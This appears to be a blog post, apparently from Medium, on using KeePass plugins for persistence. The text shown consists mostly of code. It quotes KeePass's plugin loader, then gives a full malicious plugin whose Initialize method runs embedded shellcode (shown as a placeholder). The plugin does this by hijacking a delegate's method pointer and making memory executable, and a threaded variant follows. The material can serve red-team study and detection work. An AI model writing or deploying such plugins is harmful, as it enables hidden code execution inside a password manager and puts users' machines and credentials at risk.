Persistence with KeePass - Part 1

James
James
Jun 30 · 6 min read
private static Plugin CreatePluginInstance(string strFilePath,
string strTypeName)
{
Debug.Assert(strFilePath != null);
if(strFilePath == null) throw new ArgumentNullException("strFilePath");
string strType;
if(string.IsNullOrEmpty(strTypeName))
{
strType = UrlUtil.GetFileName(strFilePath);
strType = UrlUtil.StripExtension(strType) + "." +
UrlUtil.StripExtension(strType) + "Ext";
}
else strType = strTypeName + "." + strTypeName + "Ext";
ObjectHandle oh = Activator.CreateInstanceFrom(strFilePath, strType);Plugin plugin = (oh.Unwrap() as Plugin);
if(plugin == null) throw new FileLoadException();
return plugin;
}
using KeePass.Plugins;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace KeePassPersistence
{
public class KeePassPersistenceExt : Plugin
{
public override bool Initialize(IPluginHost host)
{
Run();
return true;
}
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
public delegate uint Ret1ArgDelegate(uint address);
static uint PlaceHolder1(uint arg1) { return 0; }
public static byte[] asmBytes = new byte[890] { <shellcode>};
public unsafe void Run()
{
fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
{
// Get the FieldInfo for "_methodPtr"
Type delType = typeof(Delegate);
FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
BindingFlags.Instance);
// Set our delegate to our x86 code
Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
_methodPtr.SetValue(del, (IntPtr)startAddress);
//Disable protection
uint outOldProtection;
VirtualProtect((IntPtr)startAddress, (uint)asmBytes.Length, 0x40, out outOldProtection);
// Enjoy
uint n = (uint)0x00000001;
n = del(n);
}
}
}
}
public override bool Initialize(IPluginHost host){Thread thread = new Thread(Run);thread.Start();return true;}

James

Written by

James

Purveyor of fine, handcrafted, artisanal cybers.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade